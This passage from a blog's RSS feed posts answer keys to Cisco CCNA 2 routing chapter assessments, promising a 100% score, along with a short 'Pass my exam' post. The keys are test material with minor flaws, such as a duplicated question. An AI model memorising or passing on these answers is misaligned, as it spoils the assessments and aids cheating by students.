seconds.&lt;br /&gt;&lt;br /&gt;12. What actions will occur after RouterA loses connectivity to network 114.125.16.0? (Choose two.)&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;RouterB will include network 123.92.76.0 and 136.125.85.0 in its update to RouterA.&lt;br /&gt;Router C will learn of the loss of connectivity to network 114.125.16.0 from RouterB.&lt;br /&gt;&lt;br /&gt;13. Three routers running a distance-vector routing protocol lost all power, including the battery backups. When the routers reload, what will happen?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;They will send updates that include only directly connected routes to their directly connected neighbors.&lt;br /&gt;&lt;br /&gt;14. Which statement is true regarding cisco’s RIP_JITTER variable?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;It prevents the synchronization of routing updates by subtracting a random length of time ranging from 0% to 15% of the specified interval time from the next routing update interval.&lt;br /&gt;&lt;br /&gt;15. Which of the following methods does split horizon use to reduce incorrect routing information?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;Information learned from one source is not distributed back to that source.&lt;br /&gt;&lt;br /&gt;16. A network administrator is evaluating RIP versus EIGRP for a new network. The network will be sensitive to congestion and must respond quickly to topology changes. What are two good reasons to choose EIGRP instead of RIP in this case? (Choose two.)&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;EIGRP only updates affected neighbors.&lt;br /&gt;EIGRP updates are partial.&lt;br /&gt;&lt;br /&gt;17. Which two statements describe EIGRP? (Choose two.)&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;EIGRP sends triggered updates whenever there is a change in topology that influences the routing information.&lt;br /&gt;EIGRP sends a partial routing table update, which includes just routes that have been changed.&lt;br /&gt;&lt;br /&gt;18. Which three routing protocols are distance vector routing protocols? (Choose three).&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;RIPv1&lt;br /&gt;EIGRP&lt;br /&gt;RIPv2&lt;br /&gt;&lt;br /&gt;19. Which of the following statements are correct about RIP?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;will send out an update if there is a failure of a link&lt;br /&gt;&lt;br /&gt;20. Which event will cause a triggered update?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;a route is installed in the routing table&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5600527777189492149-73208030405689834?l=vanzuearticles.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2010-03-03T09:18:48.780+07:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>CCNA 2 Take Assessment Chapter 2 - 100%</title><link>http://vanzuearticles.blogspot.com/2010/03/ccna-2-take-assessment-chapter-2-100.html</link><category>CCNA 2 Take Assessment</category><author>vanzue@gmail.com</author><pubDate>Tue, 02 Mar 2010 18:02:26 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5600527777189492149.post-1111360199513236612</guid><description>&lt;span style="color: rgb(255, 0, 0);"&gt;Expect minimum percentage: 100%&lt;br /&gt;&lt;br /&gt;ERouting V4.0&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;1. Refer to the exhibit. Given the output in the exhibit, how would a clock rate be determined for this link?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;The rate configured on the DCE determines the clock rate&lt;br /&gt;&lt;br /&gt;2. Which piece of information is available from examining the output of the command show ip interface brief?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;Interface IP address&lt;br /&gt;&lt;br /&gt;3. Refer to the exhibit. Which set of commands will configure static routes that will allow the WinterPark and the Altamonte routers to deliver packets from each LAN and direct all other traffic to the Internet?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;WinterPark(config)# ip route 0.0.0.0 0.0.0.0 192.168.146.1&lt;br /&gt;Altamonte(config)# ip route 10.0.234.0 255.255.255.0 192.168.146.2&lt;br /&gt;Altamonte(config)# ip route 0.0.0.0 0.0.0.0 s0/1&lt;br /&gt;&lt;br /&gt;4. The output of the Router# show interfaces serial 0/1 command displays the following:&lt;br /&gt;&lt;br /&gt;Serial0/1 is up, line protocol is down.&lt;br /&gt;&lt;br /&gt;What is the most likely cause for the line protocol being down?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;No clock rate has been set&lt;br /&gt;&lt;br /&gt;5. Which two statements describe functions or characteristics of CDP? (Choose two.)&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;It starts up automatically and allows the device to detect directly connected neighbor devices that use CDP&lt;br /&gt;It allows systems to learn about each other even if different network layer protocols are configured.&lt;br /&gt;&lt;br /&gt;6. What happens to a static route entry in a routing table when the outgoing interface is not available?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;The route is removed from the table.&lt;br /&gt;&lt;br /&gt;7. What happens to a static route entry in a routing table when the outgoing interface is not available?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;The route is removed from the table&lt;br /&gt;&lt;br /&gt;8. The routers in the diagram use the subnet assignments shown. What is the most efficient route summary that can be configured on Router3 to advertise the internal networks to the cloud?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;192.1.1.0/25&lt;br /&gt;&lt;br /&gt;9.Refer to the exhibit. What is the significance of the /8 in the route to the 10.0.0.0 network?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;It indicates the number of consecutive bits, from the left, in the destination IP address of a packet that must match 10.0.0.0 to use that route&lt;br /&gt;&lt;br /&gt;10. A router has one static route configured to each destination network. Which two scenarios would require an administrator to alter the static routes that are configured on that router? (Choose two.)&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;The destination network no longer exists.&lt;br /&gt;A topology change occurs where the existing next-hop address or exit interface is not accessible.&lt;br /&gt;&lt;br /&gt;11. Refer to the exhibit. A company network engineer is assigned to establish connectivity between the two Ethernet networks so that hosts on the 10.1.1.0/24 subnet can contact hosts on the 10.1.2.0/24 subnet. The engineer has been told to use only static routing for these company routers. Which set of commands will establish connectivity between the two Ethernet networks?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;R1(config)# ip route 10.1.1.0 255.255.255.0 192.168.0.2&lt;br /&gt;R2(config)# ip route 10.1.2.0 255.255.255.0 192.168.0.1&lt;br /&gt;&lt;br /&gt;12. What two devices are responsible for converting the data from the WAN service provider into a form acceptable by the router? (Choose two).&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt; a modem&lt;br /&gt;a CSU/DSU device&lt;br /&gt;&lt;br /&gt;13.Which of the following is true regarding CDP and the graphic shown?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;By default, Router A will receive CDP advertisements from routers B and C.&lt;br /&gt;&lt;br /&gt;14. Refer to the exhibit. How will packets destined to the 172.16.0.0 network be forwarded?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;Router1 will perform recursive lookup and packet will exit S0/0.&lt;br /&gt;&lt;br /&gt;15. Refer to the exhibit. What two commands will change the next-hop address for the 10.0.0.0/8 network from 172.16.40.2 to 192.168.1.2? (Choose two.)&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;A(config)# no ip route 10.0.0.0 255.0.0.0 172.16.40.2&lt;br /&gt;A(config)# ip route 10.0.0.0 255.0.0.0 192.168.1.2&lt;br /&gt;&lt;br /&gt;16. A static route that points to the next hop IP will have what administrative distance and metric in the routing table?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;administrative distance of 1 and metric of 0&lt;br /&gt;&lt;br /&gt;17. Hosts on two separate subnets cannot communicate. The network administrator suspects a missing route in one of the routing tables. Which three commands can be used to help troubleshoot Layer 3 connectivity issues? (Choose three.)&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;ping&lt;br /&gt;traceroute&lt;br /&gt;show ip route&lt;br /&gt;&lt;br /&gt;18. Which of the following are displayed by the Router# show cdp neighbors command? (Choose three.)&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;platform&lt;br /&gt;holdtime&lt;br /&gt;local interface&lt;br /&gt;&lt;br /&gt;19. A network administrator enters the following command into Router1: ip route 192.168.0.0 255.255.255.0 S0/1/0. Router1 then receives a packet that is destined for 192.168.0.22/24. After finding the recently configured static route in the routing table, what does Router1 do next to process the packet?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;encapsulates the packet into a frame for the WAN link and forwards the packet out the S0/1/0 interface&lt;br /&gt;&lt;br /&gt;20. Refer to the exhibit. Which static route should be configured on Router1 so that host A will be able to reach host B on the 172.16.0.0 network?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;ip route 172.16.0.0 255.255.0.0 S0/0/0&lt;br /&gt;&lt;br /&gt;21. Refer to the exhibit. What two commands are required to provide connectivity between the 192.168.1.0 and 10.0.0.0 networks without requiring recursive lookup? (Choose two.)&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;A(config)# ip route 10.0.0.0 255.0.0.0 s 0/1/0&lt;br /&gt;B(config)# ip route 192.168.1.0 255.255.255.0 s 0/0/0&lt;br /&gt;&lt;br /&gt;22. Which address can be used to summarize networks 172.16.0.0/24 thru 172.16.7.0/24?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;172.16.0.0/21&lt;br /&gt;&lt;br /&gt;23. Why is it advisable to enter a next-hop IP address when creating a static route whose exit interface is an Ethernet network?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;In a multi-access network, the router cannot determine the next-hop MAC address for the Ethernet frame without a next-hop address.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5600527777189492149-1111360199513236612?l=vanzuearticles.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2010-03-03T09:02:26.260+07:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>CCNA 2 Take Assessment Chapter 1 - 100%</title><link>http://vanzuearticles.blogspot.com/2010/03/ccna-2-take-assessment-chapter-1-100.html</link><category>CCNA 2 Take Assessment</category><author>vanzue@gmail.com</author><pubDate>Tue, 02 Mar 2010 17:59:53 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5600527777189492149.post-2352703464759978420</guid><description>&lt;span style="color: rgb(255, 0, 0);"&gt;Expect minimum percentage: 100%&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;1. What three processes does a router execute when it receives a packet from one network that is destined for another network? (Choose three.)&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;decapsulates the Layer 3 packet by stripping off the Layer 2 frame header&lt;br /&gt;uses the destination IP Address in the IP header to look up the next-hop address in the routing table&lt;br /&gt;encapsulates the Layer 3 packet into the new Layer 2 frame and forwards it out the exit interface&lt;br /&gt;&lt;br /&gt;2. Which interfaces in the exhibit could be used for a leased line WAN connection? (Choose two.)&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;1&lt;br /&gt;4&lt;br /&gt;&lt;br /&gt;3. Refer to the exhibit. After host 2 is connected to the switch on the LAN, host 2 is unable to communicate with host 1. What is the cause of this problem?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;Host 1 and host 2 are on different networks.&lt;br /&gt;&lt;br /&gt;4. Which of the following is the correct flow of routines for a router startup?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;load bootstrap, load IOS, apply configuration&lt;br /&gt;&lt;br /&gt;5. What is the default sequence for loading the configuration file?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;NVRAM, TFTP, CONSOLE&lt;br /&gt;&lt;br /&gt;6. Passwords can be used to restrict access to all or parts of the Cisco IOS. Select the modes and interfaces that can be protected with passwords. (Choose three.)&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;VTY interface&lt;br /&gt;console interface&lt;br /&gt;privileged EXEC mode&lt;br /&gt;&lt;br /&gt;7. Which are functions of a router? (Choose three.)&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;packet switching&lt;br /&gt;segmentation of broadcast domains&lt;br /&gt;selection of best path based on logical addressing&lt;br /&gt;&lt;br /&gt;8. Refer to the exhibit. Host A pings host B. When R4 accepts the ping into the Ethernet interface, what two pieces of header information are included? (Choose two.)&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;destination IP address: 192.168.10.134&lt;br /&gt;destination MAC address: 9999.DADC.1234&lt;br /&gt;&lt;br /&gt;9. Refer to the exhibit. What can be concluded from the output of the running-configuration of a router?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;The commands that are displayed determine the current operation of the router.&lt;br /&gt;&lt;br /&gt;10. From what location can a router load the Cisco IOS during the boot process? (Choose two.)&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;TFTP server&lt;br /&gt;Flash memory&lt;br /&gt;&lt;br /&gt;11. Which two statements describe characteristics of load balancing? (Choose two.)&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;Load balancing allows a router to forward packets over multiple paths to the same destination network.&lt;br /&gt;Unequal cost load balancing is supported by EIGRP.&lt;br /&gt;&lt;br /&gt;12. Refer to the exhibit. What can be concluded from the routing table output in the exhibit? (Choose two.)&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;The FastEthernet0/0 and Serial0/0/0 interfaces of this router were configured with an IP address and the no shutdown command.&lt;br /&gt;An IP packet received by this router with a destination address of 198.18.9.1 will be forwarded out of the Serial0/0/0 interface.&lt;br /&gt;&lt;br /&gt;13. The serial connection shown in the graphic needs to be configured. Which configuration commands must be made on the Sydney router to establish connectivity with the Melbourne site? (Choose three.)&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;Sydney(config-if)# ip address 201.100.53.2 255.255.255.0&lt;br /&gt;Sydney(config-if)# no shutdown&lt;br /&gt;Sydney(config-if)# clock rate 56000&lt;br /&gt;&lt;br /&gt;14. What is the outcome of entering these commands?&lt;br /&gt;R1(config)# line vty 0 4&lt;br /&gt;R1(config-line)# password check123&lt;br /&gt;R1(config-line)# login&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;sets the password to be used for connecting to this router via Telnet&lt;br /&gt;&lt;br /&gt;15. Refer to the exhibit. All routers have a route in its routing table to each network that is shown in the exhibit. Default routes have not been issued on these routers. What can be concluded about how packets are forwarded in this network? (Choose two.)&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;If RouterA receives a packet that is destined for 192.168.3.146, it will be forwarded out interface S0/0/1.&lt;br /&gt;If RouterB receives a packet that is destined for 10.5.27.15, it will be forwarded out interface S0/0/1.&lt;br /&gt;&lt;br /&gt;16. Refer to the exhibit. The network administrator has configured the router with the interface IP addresses shown for the directly connected networks. Pings from the router to hosts on the connected networks or pings between router interfaces are not working. What is the most likely problem?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;The interfaces must be enabled with the no shutdown command.&lt;br /&gt;&lt;br /&gt;17. A network administrator has just entered new configurations into Router1. Which command should be executed to save configuration changes to NVRAM?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;Router1# copy running-config startup-config&lt;br /&gt;&lt;br /&gt;18. If a router cannot find a valid configuration file during the startup sequence, what will occur?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;The router will prompt the user for a response to enter setup mode.&lt;br /&gt;&lt;br /&gt;19. What header address information does a router change in the information it receives from an attached Ethernet interface before information is transmitted out another interface?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;the Layer 2 source and destination address&lt;br /&gt;&lt;br /&gt;20. The network administrator needs to connect two routers directly via their FastEthernet ports. What cable should the network administrator use?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;cross-over&lt;br /&gt;&lt;br /&gt;21. Which two statements correctly describe the components of a router? (Choose two.)&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;ROM contains diagnostics executed on hardware modules.&lt;br /&gt;Flash memory does not lose its contents during a reboot.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5600527777189492149-2352703464759978420?l=vanzuearticles.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2010-03-03T08:59:53.201+07:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>CCNA 2 Take Assessment Chapter 3 - 100%</title><link>http://vanzuearticles.blogspot.com/2010/03/ccna-2-take-assessment-chapter-3-100.html</link><category>CCNA 2 Take Assessment</category><author>vanzue@gmail.com</author><pubDate>Tue, 02 Mar 2010 18:14:36 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5600527777189492149.post-1845224347953829928</guid><description>&lt;h2 style="color: rgb(255, 102, 0);" class="post-title"&gt; &lt;a href="http://answersforccna.blogspot.com/2009/02/erouting-v40-chapter-3.html"&gt;&lt;br /&gt;&lt;/a&gt; &lt;/h2&gt; &lt;span class="post-author"&gt; &lt;/span&gt;    &lt;p&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;Expect minimum percentage: 100%&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;1) Refer to the exhibit. Which statement correctly describes how R1 will determine the best path to R2?&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;R1 will install an EIGRP route using network B in its routing table because the administrative distance of EIGRP is lower than RIP.&lt;br /&gt;&lt;br /&gt;2) Which two statements are true regarding classless routing protocols? (Choose two.)&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;sends subnet mask information in routing updates&lt;br /&gt;allows for use of both 192.168.1.0/30 and 192.168.1.16/28 subnets in the same topology&lt;br /&gt;&lt;br /&gt;3) Which command would the network administrator issue to determine if load balancing is in effect on a router?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;show ip route&lt;br /&gt;&lt;br /&gt;4) Which statement is true regarding routing protocols?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;EIGRP uses DUAL to calculate the shortest path and can be configured to do unequal cost load balancing.&lt;br /&gt;&lt;br /&gt;5) An engineer creates a static route by entering the Router(config)# ip route 10.0.0.0 255.255.255.0 192.168.1.2 command. What can be concluded about this route?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;The administrative distance of this route is 1.&lt;br /&gt;&lt;br /&gt;6) Which two conditions would create a setting where the use of a distance-vector routing protocol would be efficient? (Choose two.)&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;the network is using a hub and spoke topology&lt;br /&gt;the network is using a flat design&lt;br /&gt;&lt;br /&gt;7) Refer to the exhibit. If RIP is the routing protocol, what is the value of the metric from router A to network 192.168.5.0/24?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;3&lt;br /&gt;&lt;br /&gt;8) What is the purpose of a routing protocol?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;It allows a router to share information about known networks with other routers.&lt;br /&gt;&lt;br /&gt;9) Which two statements correctly describe the concepts of administrative distance and metric? (Choose two.)&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;Administrative distance refers to the trustworthiness of a particular route.&lt;br /&gt;Routes with the smallest metric to a destination indicate the best path.&lt;br /&gt;&lt;br /&gt;10)Which of the following best describes the operation of distance vector routing protocols?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;They send their routing tables to directly connected neighbors.&lt;br /&gt;&lt;br /&gt;11) Which of the following is associated with link-state routing protocols?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;shortest-path first calculations&lt;br /&gt;&lt;br /&gt;12) The following line of code is displayed in a routing table:&lt;br /&gt;R 209.165.201.0/24 [120/2] via 192.168.252.2, 00:00:16, S0/0/0&lt;br /&gt;What can be concluded from this output?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;The value, 120, is used to determine the best path when a router has more than one routing protocol configured for the same destination network.&lt;br /&gt;&lt;br /&gt;13) Why is fast convergence desirable in networks that use dynamic routing protocols?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;Routers may make incorrect forwarding decisions until the network has converged.&lt;br /&gt;&lt;br /&gt;14) Which of the following conditions must be met in order for a network to have converged&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;The routers in the network are operating with consistent routing knowledge.&lt;br /&gt;&lt;br /&gt;15) Which two statements are true regarding the advantages of the use of static routes? (Choose two).&lt;br /&gt;&lt;br /&gt;increased security&lt;br /&gt;the administrator maintains control over routing&lt;br /&gt;&lt;br /&gt;16) Which two statements are true regarding metrics? (Choose two.)&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;EIGRP uses bandwidth as a metric.&lt;br /&gt;OSPF uses cost based on bandwidth as a metric.&lt;br /&gt;&lt;br /&gt;17) What will be the result of the following commands?&lt;br /&gt;ORL(config)# interface fastethernet 0/0&lt;br /&gt;ORL(config-if)# ip address 172.16.3.1 255.255.255.0&lt;br /&gt;ORL(config-if)# no shutdown&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;A routing table entry is made to the 172.16.3.0 network with a code of "C".&lt;br /&gt;&lt;br /&gt;18) Refer to the exhibit. Router1 and Router2 are running EIGRP. All interfaces are operational and packets can be forwarded between all networks. What information will be found in the routing table for Router1?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;The administrative distance of the route to network 172.16.0.0 will be 90.&lt;br /&gt;&lt;br /&gt;19) A growing medium-sized manufacturing company recently began to have routing instability issues. The company uses static routes and has a mixture of over 30 Cisco and non-Cisco routers. The network administrator has decided to convert the network to dynamic routing. What characteristics of protocols should be considered in this selection process?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;OSPF can be used between the routers.&lt;br /&gt;&lt;br /&gt;20) A router learns two paths with equal metrics to a destination network via the RIP routing protocol. How will the router handle packets to the destination network?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;The router will install both routes in the routing table and load balance between the two.&lt;br /&gt;&lt;br /&gt;21) The following line of code is present in the routing table:&lt;br /&gt;O 10.16.1.0/27 [110/129] via 192.168.1.5, 00:00:05, Serial0/0/1&lt;br /&gt;What does the number 129 indicate in this output?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;The cost for this link has a value of 129.&lt;br /&gt;&lt;br /&gt;22) When multiple routing protocols have a route to the same destination network, what determines which route is installed in the routing table?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;lowest administrative distance&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5600527777189492149-1845224347953829928?l=vanzuearticles.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2010-03-03T09:14:36.925+07:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Pass my exam ENetwork</title><link>http://vanzuearticles.blogspot.com/2010/02/pass-my-exam-enetwork.html</link><category>Pass my exam ENetwork</category><category>About Me</category><author>vanzue@gmail.com</author><pubDate>Thu, 25 Feb 2010 20:30:29 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5600527777189492149.post-4889629214501314891</guid><description>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_JYCZNSWdoTU/S4dN8m7-21I/AAAAAAAAARI/prSVUSFMxcs/s1600-h/Pass+my+exam.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 250px;" src="http://2.bp.blogspot.com/_JYCZNSWdoTU/S4dN8m7-21I/AAAAAAAAARI/prSVUSFMxcs/s400/Pass+my+exam.JPG" border="0" alt="" id="BLOGGER_PHOTO_ID_5442404378340154194" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;Pass my exam ENetwork...follow this blog for download module CCNA... :)&lt;/span&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="fullpost"&gt;&lt;/span&gt;&lt;a href="http://vanzuearticles.blogspot.com"&gt;~ Art and Skill ~ &lt;/a&gt;&lt;br /&gt;&lt;div&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5600527777189492149-4889629214501314891?l=vanzuearticles.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2010-02-26T11:30:29.818+07:00</app:edited><media:thumbnail url="http://2.bp.blogspot.com/_JYCZNSWdoTU/S4dN8m7-21I/AAAAAAAAARI/prSVUSFMxcs/s72-c/Pass+my+exam.JPG" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><media:rating>nonadult</media:rating></channel></rss>

